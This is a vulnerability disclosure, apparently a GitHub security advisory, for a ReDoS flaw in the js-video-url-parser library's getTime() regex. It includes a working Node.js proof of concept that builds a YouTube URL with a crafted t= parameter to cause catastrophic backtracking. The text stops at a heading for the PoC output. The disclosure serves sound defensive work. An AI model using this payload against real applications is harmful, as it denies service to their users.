ReDoS Vulnerability in jsVideoUrlParser util.js due to Inefficient Regex for Time Matching from URL (CWE-1333)

[ybdesire]

Description (Standardized CVE Text)

A Regular Expression Denial of Service (ReDoS) vulnerability exists through version 0.1.3 to 0.5.1. The getTime() function in lib/util.js (line 97) uses the regular expression /^(\d+[smhdw]?)+$/ to validate timestamp parameters parsed from video URLs. Due to nested quantifiers in the pattern, a crafted string consisting of a long sequence of digits followed by a single non-matching character causes catastrophic backtracking with O(2^n) time complexity. An unauthenticated remote attacker can trigger this condition by supplying a malicious t or start URL parameter to any application that calls urlParser.parse(), causing the Node.js event loop to block for several seconds per request and resulting in denial of service.

jsVideoUrlParser/lib/util.js

Line 97 in 7654acd

if (timeString.match(/^(\d+[smhdw]?)+$/)) {

POC

'use strict';

const urlParser = require('js-video-url-parser');

// ── attack string: long digit run + non-matching terminator ──────────────────
const DIGITS  = 25;
const attackStr  = '0'.repeat(DIGITS) + '!';

// ── craft the malicious YouTube URL (standard README usage) ──────────────────
const normalUrl    = 'https://www.youtube.com/watch?v=HRb7B9fPhfA&t=1h30m20s';
const maliciousUrl = `https://www.youtube.com/watch?v=HRb7B9fPhfA&t=${attackStr}`;

console.log('======================================================');
console.log(' ReDoS PoC  |  js-video-url-parser  |  Vulnerability 1');
console.log('======================================================');
console.log('Vulnerable file : lib/util.js line 97');
console.log('Vulnerable regex: /^(\\d+[smhdw]?)+$/');
console.log('Attack string   :', attackStr);
console.log('Attack URL      :', maliciousUrl);
console.log('');

// ── baseline: normal time string should return in < 1 ms ────────────────────
let t0 = Date.now();
const normalResult = urlParser.parse(normalUrl);
let elapsed = Date.now() - t0;
console.log(`[baseline] urlParser.parse(normal URL) => ${elapsed} ms`);
console.log('           result:', JSON.stringify(normalResult));
console.log('');

// ── attack: malicious t= parameter triggers ReDoS ───────────────────────────
console.log('[attack]   Calling urlParser.parse(malicious URL) ...');
t0 = Date.now();
const attackResult = urlParser.parse(maliciousUrl);
elapsed = Date.now() - t0;

console.log(`[attack]   Returned after ${elapsed} ms`);
console.log('           result:', JSON.stringify(attackResult));
console.log('');

if (elapsed > 500) {
  console.log('[RESULT]   *** VULNERABLE ***');
  console.log(`           Parse took ${elapsed} ms — catastrophic backtracking confirmed.`);
} else {
  console.log('[RESULT]   Returned quickly; try increasing DIGITS for a more visible delay.');
}

POC running output